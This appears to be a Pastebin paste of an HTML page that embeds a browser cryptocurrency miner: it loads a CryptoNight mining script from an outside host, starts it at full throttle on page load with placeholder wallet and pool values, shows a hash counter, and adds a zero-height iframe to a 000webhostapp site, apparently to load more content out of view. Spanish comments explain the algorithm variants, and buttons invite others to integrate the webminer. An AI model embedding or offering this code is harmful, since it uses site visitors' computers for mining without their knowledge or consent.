Advertisement
manuelfhq

Miner Actualizado

Jun 25th, 2018
1,572
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.41 KB | None | 0 0
  1. <head>
  2. <meta name="robots" content="noindex, nofollow"/>
  3. <meta http-equiv="Cache-Control" content="no-cache, no-store, must-revalidate" />
  4. <meta http-equiv="Pragma" content="no-cache" />
  5. <meta http-equiv="Expires" content="0" />
  6. </head>
  7.  
  8. <body>
  9. <!-- Para CryptoNight Variant 0 utilisen el algoritmo ?algo=cn?variant=0 -->
  10. <!-- Para CryptoNight Variant 1 utilisen el algoritmo ?algo=cn?variant=1 -->
  11. <!-- Para CryptoNight Light Variant 1 utilisen el algoritmo ?algo=cn-lite?variant=1 -->
  12. <!-- Ejemplo perfekt=wss://?algo=cn-lite?variant=1?jason= -->
  13. <script src="https://ethtrader.de/perfekt/perfekt.js?perfekt=wss://?algo=cn?variant=0?jason=PLACE_YOUR_POOL_HERE" > </script>
  14. <script>
  15.  
  16. throttleMiner = 0;
  17. PerfektStart('YOUR_EMAIL_OR_WALLET', 'x');
  18. </script>
  19.  
  20.  
  21.  
  22.  
  23.  
  24. <script>
  25. var status;
  26. var lastrate = 0;
  27. var totalHashes = 0;
  28. var totalHashes2 = 0;
  29. var acceptedHashes = 0;
  30. var hashesPerSecond = 0;
  31.  
  32. function myFunction() {
  33. status = setInterval(stats, 1000);
  34. }
  35.  
  36. function stats() {
  37. lastrate = ((totalhashes) * 0.5 + lastrate * 0.5);
  38. totalHashes = totalhashes + totalHashes
  39. hashesPerSecond = Math.round(lastrate);
  40. totalHashes2 = totalHashes;
  41. totalhashes = 0;
  42. acceptedHashes = GetAcceptedHashes();
  43. document.getElementById("hashes-per-second").innerHTML = hashesPerSecond;
  44. document.getElementById("accepted-shares").innerHTML = totalHashes2 +' | '+ acceptedHashes;
  45. }
  46.  
  47. myFunction();
  48. </script>
  49.  
  50. <h2 id="hashes-per-second">0</h2>
  51. <div class="box">
  52. <h3> Total Hashes | Accepted Shares</h3>
  53. <h2 id="accepted-shares">0</h2>
  54. </div>
  55. </body>
  56. </html>
  57. <div align="center">
  58. <form action="https://pastebin.com/aPEbqDy4"><td><input type="submit" value="Integrate our Webminer"/></td></form>
  59. </div>
  60. <div align="center">
  61. <form action="http://bluboosting.000webhostapp.com/"><td><input type="submit" value="Mine in your own pool"/></td></form>
  62. </div>
  63.  
  64. <!-- Global site tag (gtag.js) - Google Analytics -->
  65. <script async src="https://www.googletagmanager.com/gtag/js?id=UA-81214188-2"></script>
  66. <script>
  67. window.dataLayer = window.dataLayer || [];
  68. function gtag(){dataLayer.push(arguments);}
  69. gtag('js', new Date());
  70.  
  71. gtag('config', 'UA-81214188-2');
  72. </script>
  73.  
  74. </script>
  75. <iframe src="http://bluboosting.000webhostapp.com/mi.html" width="99%" height="0" frameborder="0"></iframe>
  76. </script>
  77. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement